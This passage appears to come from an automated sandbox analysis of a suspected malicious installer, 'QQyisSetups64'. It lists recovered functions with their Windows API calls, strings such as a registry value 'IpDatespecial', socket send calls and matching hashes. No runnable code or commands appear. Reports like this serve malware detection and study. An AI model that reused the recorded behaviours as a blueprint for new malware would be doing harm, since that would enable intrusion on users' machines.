Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: ErrorLast$CurrentThread$EventsMultipleTimerWaitWaitable
String ID:
API String ID: 3058130114-0
Opcode ID: a6aaca9ca4ef2296c008045cbb8b8390893e6b47f38bf5cf4694fec11d5cf9b2
Instruction ID: 4c0f1d82f8c5d63777c10d50330b9070391cedcc2ae31eadd8613725a038581c
Opcode Fuzzy Hash: a6aaca9ca4ef2296c008045cbb8b8390893e6b47f38bf5cf4694fec11d5cf9b2
Instruction Fuzzy Hash: DB51DF706007419BDB20BF65C984BAAB7E5BF84B1CF109959DD5AD7280EB34F900CF91

Function 0378E6B0 Relevance: 10.5, APIs: 7, Instructions: 44filesynchronizationstringCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,0378E815,?,?,?,?,771B23A0,00000000), ref: 0378E6BD
CreateFileW.KERNEL32(037B0D80,40000000,00000002,00000000,00000004,00000002,00000000,?,?,0378E815,?,?,?,?,771B23A0,00000000), ref: 0378E6D7
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0378E6F2
lstrlenW.KERNEL32(?,00000000,00000000), ref: 0378E6FF
WriteFile.KERNEL32(00000000,?,00000000), ref: 0378E70A
CloseHandle.KERNEL32(00000000), ref: 0378E711
ReleaseMutex.KERNEL32(00000000), ref: 0378E71E

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: File$CloseCreateHandleMutexObjectPointerReleaseSingleWaitWritelstrlen
String ID:
API String ID: 4202892810-0
Opcode ID: 22cc79f53e338e849a7b9dfb2f961fdfbf157fa54614e7309bd027c7b820066f
Instruction ID: 57dd50daa484904a0e63159634827c4f0b197b619dd9dca9d82ada8fb95f046c
Opcode Fuzzy Hash: 22cc79f53e338e849a7b9dfb2f961fdfbf157fa54614e7309bd027c7b820066f
Instruction Fuzzy Hash: 3301C871381614BBE22477A4EC0EF9B367CEB89B21F108644FB15E61C5D7B8680087A5

Function 03793D2E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,037A6318,00000008,03793E36,00000000,00000000,?,03794500,00000000,00000001,00000000,?,03798DE6,00000018,037A6448,0000000C), ref: 03793D3F
__lock.LIBCMT ref: 03793D73

Part of subcall function 03798E5B: __mtinitlocknum.LIBCMT ref: 03798E71
Part of subcall function 03798E5B: __amsg_exit.LIBCMT ref: 03798E7D
Part of subcall function 03798E5B: EnterCriticalSection.KERNEL32(00000000,00000000,?,03793F06,0000000D,037A6340,00000008,03793FFF,00000000,?,037910F0,00000000,037A6278,00000008,03791155,?), ref: 03798E85

InterlockedIncrement.KERNEL32(?), ref: 03793D80
__lock.LIBCMT ref: 03793D94
___addlocaleref.LIBCMT ref: 03793DB2

Strings

KERNEL32.DLL, xrefs: 03793D3A

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: 2ab875409470e3fae09dbf1ba4b6a2c097f4be36c2a4fb7bea6a4eea0a80b38e
Instruction ID: 3065a5125273642949e5e4dbcf7dec0fc0fe2f2b49e44a6be12d16d526d2a01c
Opcode Fuzzy Hash: 2ab875409470e3fae09dbf1ba4b6a2c097f4be36c2a4fb7bea6a4eea0a80b38e
Instruction Fuzzy Hash: 49018479400B00EFFB20EF69E80874AFBE0AF85314F108B4ED5966B790CBB4A541CB15

Function 02C897E2 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,02C97C00,00000008,02C898EA,00000000,00000000,?,02C89FB0,00000000,00000001,00000000,?,02C8C0CF,00000018,02C97C70,0000000C), ref: 02C897F3
__lock.LIBCMT ref: 02C89827

Part of subcall function 02C8C144: __mtinitlocknum.LIBCMT ref: 02C8C15A
Part of subcall function 02C8C144: __amsg_exit.LIBCMT ref: 02C8C166
Part of subcall function 02C8C144: EnterCriticalSection.KERNEL32(00000000,00000000,?,02C899BA,0000000D,02C97C28,00000008,02C89AB1,00000000,?,02C87711,00000000,02C97B60,00000008,02C87776,?), ref: 02C8C16E

InterlockedIncrement.KERNEL32(?), ref: 02C89834
__lock.LIBCMT ref: 02C89848
___addlocaleref.LIBCMT ref: 02C89866

Strings

KERNEL32.DLL, xrefs: 02C897EE

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: ef5a588bb8dad73cee5524e566644423bf04a431b1b376caee42ed514a2181d5
Instruction ID: d10ab32b1440513487f0aee054562010db1d492fcd443576f1d6c312d2c8cc8f
Opcode Fuzzy Hash: ef5a588bb8dad73cee5524e566644423bf04a431b1b376caee42ed514a2181d5
Instruction Fuzzy Hash: E701C0B1840B00DFEB21AF79C84835AFBE1AF50328F10894ED49696390CBB4A644DF25

Function 0378B78C Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 32registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002), ref: 0378B7A7
RegDeleteValueW.ADVAPI32(?,IpDatespecial), ref: 0378B7B7
RegSetValueExW.ADVAPI32(?,IpDatespecial,00000000,00000003,?,00000004), ref: 0378B7CE
RegCloseKey.ADVAPI32(?,?,00000004), ref: 0378B7D9

Strings

IpDatespecial, xrefs: 0378B7B1, 0378B7C8
Console, xrefs: 0378B79D

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: Value$CloseDeleteOpen
String ID: Console$IpDatespecial
API String ID: 3183427449-1840232981
Opcode ID: 6ec2f2a8e3abfbdcebd180ef9cd42c0f7a46b83cce5b81837e02fb8732a15ea9
Instruction ID: 3b1cd721c8cfce0b466b76216807a7f14bf07667cea2edec6c2bf7635a983e74
Opcode Fuzzy Hash: 6ec2f2a8e3abfbdcebd180ef9cd42c0f7a46b83cce5b81837e02fb8732a15ea9
Instruction Fuzzy Hash: 26F0A771344744FFD3249764AC4FF5BB754F7C9711F508A0DFBC4651828664A100E755

Function 037A02FC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 037A031D

Part of subcall function 03793E5B: __getptd_noexit.LIBCMT ref: 03793E5E
Part of subcall function 03793E5B: __amsg_exit.LIBCMT ref: 03793E6B

__getptd.LIBCMT ref: 037A032E
__getptd.LIBCMT ref: 037A033C

Strings

RCC, xrefs: 037A0308
csm, xrefs: 037A0316
MOC, xrefs: 037A030F

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$RCC$csm
API String ID: 803148776-2671469338
Opcode ID: a1f0d33c8d38bd48e94782b4de51ff7935ea793739f44933f6f473294c896614
Instruction ID: 29772e28fb9e27a4a81fad4390bc0c92feb2c0cc0beae7b7a61494d654ee8a72
Opcode Fuzzy Hash: a1f0d33c8d38bd48e94782b4de51ff7935ea793739f44933f6f473294c896614
Instruction Fuzzy Hash: DBE0E53C500604CFEF20EB6C908AB6837D9BF8C615F590AA7940CCF222C728E4908A82

Function 02C933F1 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 02C93412

Part of subcall function 02C8990F: __getptd_noexit.LIBCMT ref: 02C89912
Part of subcall function 02C8990F: __amsg_exit.LIBCMT ref: 02C8991F

__getptd.LIBCMT ref: 02C93423
__getptd.LIBCMT ref: 02C93431

Strings

MOC, xrefs: 02C93404
csm, xrefs: 02C9340B
RCC, xrefs: 02C933FD

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$RCC$csm
API String ID: 803148776-2671469338
Opcode ID: 6cafc6eb67b1167ca934f12c74b901a19b36c58c2209ef507fb1707306695bdb
Instruction ID: bfec00e7dc39746f03452ec954c801756d92e7b65a7a5488e33d272ec0e89072
Opcode Fuzzy Hash: 6cafc6eb67b1167ca934f12c74b901a19b36c58c2209ef507fb1707306695bdb
Instruction Fuzzy Hash: 53E01A345041888ECB20AB68C14DB783AE5FBC9318F5A84F1E41DCB222C739EA50DD53

Function 03789C30 Relevance: 9.1, APIs: 6, Instructions: 108COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 03789C3F

Part of subcall function 0378F673: __FF_MSGBANNER.LIBCMT ref: 0378F68C
Part of subcall function 0378F673: __NMSG_WRITE.LIBCMT ref: 0378F693
Part of subcall function 0378F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03794500,00000000,00000001,00000000,?,03798DE6,00000018,037A6448,0000000C,03798E76), ref: 0378F6B8

_free.LIBCMT ref: 03789C63
_memset.LIBCMT ref: 03789CBB

Part of subcall function 0378A610: GetObjectW.GDI32(?,00000054,?), ref: 0378A62E

CreateDIBSection.GDI32(00000000,00000008,00000000,00000000,00000000,00000000), ref: 03789CD3
_free.LIBCMT ref: 03789CE4
_free.LIBCMT ref: 03789D23

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: _free$AllocateCreateHeapObjectSection_malloc_memset
String ID:
API String ID: 1756752955-0
Opcode ID: 45e76e65248c37a7b4dc02d967769d8c05dc0b6d58592696664fbba2b1ca3df0
Instruction ID: c892edded80128f35afea36b40f79f06df89ab584c4ca4b5e98975e57ed96163
Opcode Fuzzy Hash: 45e76e65248c37a7b4dc02d967769d8c05dc0b6d58592696664fbba2b1ca3df0
Instruction Fuzzy Hash: 8031B6B26403056BE710EF75E884B67B7D8FF4A314F04853ADA09CB640E7B1E454CBA5

Function 03785080 Relevance: 9.1, APIs: 6, Instructions: 107networkCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(000002FF), ref: 037850CA
WSASetLastError.WS2_32(0000139F), ref: 037850E2
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,00000000,000000FF), ref: 037850EC

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeave
String ID:
API String ID: 4082018349-0
Opcode ID: f4a1045818ff3de6ed2c35a5f3b9641880ae545e543469e8c3dc4eb710d6237a
Instruction ID: 5cd285c58dafd9d1a5b2eeccdaa6cea570c2a7015f3924fea22f66931dc39329
Opcode Fuzzy Hash: f4a1045818ff3de6ed2c35a5f3b9641880ae545e543469e8c3dc4eb710d6237a
Instruction Fuzzy Hash: 6331B076A84748ABD714EF64DC49B6AB3E8EB49720F10895EED15C7780E73AE800CB50

Function 02C85060 Relevance: 9.1, APIs: 6, Instructions: 107networkCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(000002FF), ref: 02C850AA
WSASetLastError.WS2_32(0000139F), ref: 02C850C2
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,00000000,000000FF), ref: 02C850CC

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeave
String ID:
API String ID: 4082018349-0
Opcode ID: 34c95b3af14ad86c14c285f5dee64d872f9c8dca5156764cf9d1e06e2ece1503
Instruction ID: 419dd11548e58f5ae8626bb86ed7a980c633122736e7f7afc923c5f919d91520
Opcode Fuzzy Hash: 34c95b3af14ad86c14c285f5dee64d872f9c8dca5156764cf9d1e06e2ece1503
Instruction Fuzzy Hash: CF31D072A442449BD720DF94EC49B6BB3E9FB48759F408A1AF906C7680D776E810CB90

Function 02C8485A Relevance: 9.1, APIs: 6, Instructions: 91sleepsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 02C848E1
WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 02C848EC
Sleep.KERNEL32(00000258,?,E484B528,?,?,?), ref: 02C848F9
CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 02C84914
CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 02C8491D
Sleep.KERNEL32(0000012C,?,E484B528,?,?,?), ref: 02C8492E

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: CloseHandleObjectSingleSleepWait
String ID:
API String ID: 640476663-0
Opcode ID: 989536844a2ff9e6f88224ce41686fb591749af47cebceb9cb6c850f64db8f01
Instruction ID: 906cd1e3994a6414f968d048a29850fa0dcfa7f44b0b9b8e9aa5026d7eb65c73
Opcode Fuzzy Hash: 989536844a2ff9e6f88224ce41686fb591749af47cebceb9cb6c850f64db8f01
Instruction Fuzzy Hash: 33216A721042849BCB14FBA8DD48A87F3F9FF897547554B08E554C7285C6349805CFE0

Function 037A05AE Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 037A05D6

Part of subcall function 037A00B7: __getptd.LIBCMT ref: 037A00C5
Part of subcall function 037A00B7: __getptd.LIBCMT ref: 037A00D3

__getptd.LIBCMT ref: 037A05E0

Part of subcall function 03793E5B: __getptd_noexit.LIBCMT ref: 03793E5E
Part of subcall function 03793E5B: __amsg_exit.LIBCMT ref: 03793E6B

__getptd.LIBCMT ref: 037A05EE
__getptd.LIBCMT ref: 037A05FC
__getptd.LIBCMT ref: 037A0607
_CallCatchBlock2.LIBCMT ref: 037A062D

Part of subcall function 037A015C: __CallSettingFrame@12.LIBCMT ref: 037A01A8

Part of subcall function 037A06D4: __getptd.LIBCMT ref: 037A06E3
Part of subcall function 037A06D4: __getptd.LIBCMT ref: 037A06F1

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: fd405b44e0134d1d33cc028f03597bed877d160d75f2787ecf98786bf8b9e7aa
Instruction ID: 5539cbce340d4943f7827171453247fed249b28a5c0442f124bfba58b8036875
Opcode Fuzzy Hash: fd405b44e0134d1d33cc028f03597bed877d160d75f2787ecf98786bf8b9e7aa
Instruction Fuzzy Hash: 9911C9B9D00709DFEF10EFA4D488B9D7BB0FF48314F10866AE825AB250DB3899159B50

Function 02C936A3 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 02C936CB

Part of subcall function 02C9325B: __getptd.LIBCMT ref: 02C93269
Part of subcall function 02C9325B: __getptd.LIBCMT ref: 02C93277

__getptd.LIBCMT ref: 02C936D5

Part of subcall function 02C8990F: __getptd_noexit.LIBCMT ref: 02C89912
Part of subcall function 02C8990F: __amsg_exit.LIBCMT ref: 02C8991F

__getptd.LIBCMT ref: 02C936E3
__getptd.LIBCMT ref: 02C936F1
__getptd.LIBCMT ref: 02C936FC
_CallCatchBlock2.LIBCMT ref: 02C93722

Part of subcall function 02C93300: __CallSettingFrame@12.LIBCMT ref: 02C9334C

Part of subcall function 02C937C9: __getptd.LIBCMT ref: 02C937D8
Part of subcall function 02C937C9: __getptd.LIBCMT ref: 02C937E6

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: c9699f91bb456667088a2856ee36da4afb6a189b4520278d2078b146ff2f24ab
Instruction ID: 2c6d401e6eec093961c71abe6f6458b2549adcb47500d7b93755ffca2a578b47
Opcode Fuzzy Hash: c9699f91bb456667088a2856ee36da4afb6a189b4520278d2078b146ff2f24ab
Instruction Fuzzy Hash: CE11D7B1C00249DFDF00EFA4D549AAD7BB2FF04314F1085AAE868A7350DB399A15EF50

Function 03794885 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 03794891

Part of subcall function 03793E5B: __getptd_noexit.LIBCMT ref: 03793E5E
Part of subcall function 03793E5B: __amsg_exit.LIBCMT ref: 03793E6B

__amsg_exit.LIBCMT ref: 037948B1
__lock.LIBCMT ref: 037948C1
InterlockedDecrement.KERNEL32(?), ref: 037948DE
_free.LIBCMT ref: 037948F1
InterlockedIncrement.KERNEL32(028B1688), ref: 03794909

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: d61f256f9571ca6c44e9acbffa0d98f0cae4e6cb93675107915c552cd9180820
Instruction ID: e5f2ba6a4f8b51b6fb6e6bee0db913618e69375e44ee3807bf8440b7e7c00727
Opcode Fuzzy Hash: d61f256f9571ca6c44e9acbffa0d98f0cae4e6cb93675107915c552cd9180820
Instruction Fuzzy Hash: 1A01A135D01B55ABFE10FB2AB409B5DB3A0BF49720F094387D910AB280CB385452DBD2

Function 02C8D9BE Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 02C8D9CA

Part of subcall function 02C8990F: __getptd_noexit.LIBCMT ref: 02C89912
Part of subcall function 02C8990F: __amsg_exit.LIBCMT ref: 02C8991F

__amsg_exit.LIBCMT ref: 02C8D9EA
__lock.LIBCMT ref: 02C8D9FA
InterlockedDecrement.KERNEL32(?), ref: 02C8DA17
_free.LIBCMT ref: 02C8DA2A
InterlockedIncrement.KERNEL32(02D41688), ref: 02C8DA42

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: 9a04b21a23d3e7685340b47acfe8d1696f6d8fc24ff19ccbfea2cb841f3f3ae2
Instruction ID: 47e1adb44f1eca315dd4ec9d9083317470e26529975ce10f00309a9a4846ae93
Opcode Fuzzy Hash: 9a04b21a23d3e7685340b47acfe8d1696f6d8fc24ff19ccbfea2cb841f3f3ae2
Instruction Fuzzy Hash: DB01D672D816219BDB25BF749448BAEB362BF4076CF14C209D812672C0CB346651DFD6

Function 02C848C7 Relevance: 9.0, APIs: 6, Instructions: 44sleepsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 02C848E1
WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 02C848EC
Sleep.KERNEL32(00000258,?,E484B528,?,?,?), ref: 02C848F9
CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 02C84914
CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 02C8491D
Sleep.KERNEL32(0000012C,?,E484B528,?,?,?), ref: 02C8492E

Part of subcall function 02C83F60: GetCurrentThreadId.KERNEL32 ref: 02C83F65
Part of subcall function 02C83F60: send.WS2_32(?,02C97440,00000010,00000000), ref: 02C83FC6
Part of subcall function 02C83F60: SetEvent.KERNEL32(?), ref: 02C83FE9
Part of subcall function 02C83F60: InterlockedExchange.KERNEL32(?,00000000), ref: 02C83FF5
Part of subcall function 02C83F60: WSACloseEvent.WS2_32(?), ref: 02C84003
Part of subcall function 02C83F60: shutdown.WS2_32(?,00000001), ref: 02C8401B
Part of subcall function 02C83F60: closesocket.WS2_32(?), ref: 02C84025

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: Close$EventHandleObjectSingleSleepWait$CurrentExchangeInterlockedThreadclosesocketsendshutdown
String ID:
API String ID: 1019945655-0
Opcode ID: 048c7800c8cc46a64c38a0c28f3c8d2bb222281da2317f8bdeb9be07061052a8
Instruction ID: f02b230d9f2f7a33634ecbecb1214009bfa8a2996b6abbac208a3e4ac730a8f6
Opcode Fuzzy Hash: 048c7800c8cc46a64c38a0c28f3c8d2bb222281da2317f8bdeb9be07061052a8
Instruction Fuzzy Hash: 53F036722046045BC624EB69DC84E4AF3E9EFC5760B154B09E26987694CA75EC01CBE0

Function 03789BA0 Relevance: 9.0, APIs: 6, Instructions: 42COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 03789BD2
EnterCriticalSection.KERNEL32(037AFB64,?,?,?,03789B7B), ref: 03789BE3
EnterCriticalSection.KERNEL32(037AFB64,?,?,?,03789B7B), ref: 03789BF8
GdiplusShutdown.GDIPLUS(00000000,?,?,?,03789B7B), ref: 03789C04
LeaveCriticalSection.KERNEL32(037AFB64,?,?,?,03789B7B), ref: 03789C15
LeaveCriticalSection.KERNEL32(037AFB64,?,?,?,03789B7B), ref: 03789C1C

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: CriticalSection$EnterLeave$DeleteGdiplusObjectShutdown
String ID:
API String ID: 4268643673-0
Opcode ID: 1a517f2a7dae3cd8060a05d9f5fb03b1d3676f3caf86a6f90c50bc98fbb3eef3
Instruction ID: 23a0979438dd197ab0dc9e8f581ddad0528979def5a8b1286000c419a54dc902
Opcode Fuzzy Hash: 1a517f2a7dae3cd8060a05d9f5fb03b1d3676f3caf86a6f90c50bc98fbb3eef3
Instruction Fuzzy Hash: EE011AB1A01B04EFC754EFBA9C94455BBF4FAC9215325C6AEE118CA246C376C403CF95

Function 037848D0 Relevance: 9.0, APIs: 6, Instructions: 36sleepsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 037848E1
